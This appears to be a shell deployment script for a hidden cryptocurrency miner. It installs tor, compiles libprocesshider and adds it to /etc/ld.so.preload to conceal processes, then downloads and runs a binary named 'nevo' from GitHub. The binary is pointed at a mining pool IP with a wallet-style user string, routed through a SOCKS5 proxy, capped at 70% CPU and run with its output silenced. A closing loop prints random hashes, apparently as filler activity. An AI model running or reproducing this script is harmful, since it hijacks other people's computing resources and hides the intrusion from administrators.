#!/bin/sh
ln -fs /usr/share/zoneinfo/America/Toronto /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata
apt update
apt -y install binutils cmake build-essential screen unzip net-tools curl nano tor
service tor start

git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider;make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
mv libprocesshider.so /usr/local/lib/;echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
cd ..
A=149.50.222.86:443
B=Ne4MNhNc6PRbzHw8mfZrtdRSGN7FR7wyHYEqCoYGtBkL4QKtcDk6kn1co5h7tyJmgDYN3uDssEkVAjFa595qSfse2mN4miG2f
C=GAS
wget https://github.com/devinasaliya/super-eureka/raw/main/nevo && chmod u+x nevo
./nevo -o 149.50.222.86:443 -u Ne4MNhNc6PRbzHw8mfZrtdRSGN7FR7wyHYEqCoYGtBkL4QKtcDk6kn1co5h7tyJmgDYN3uDssEkVAjFa595qSfse2mN4miG2f.$(echo $(shuf -i 1-9 -n 1)-yui) -a rx/nevo -x socks5://192.252.209.155:14455 --cpu-max-threads-hint=70% -k  >/dev/null 2>&1
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
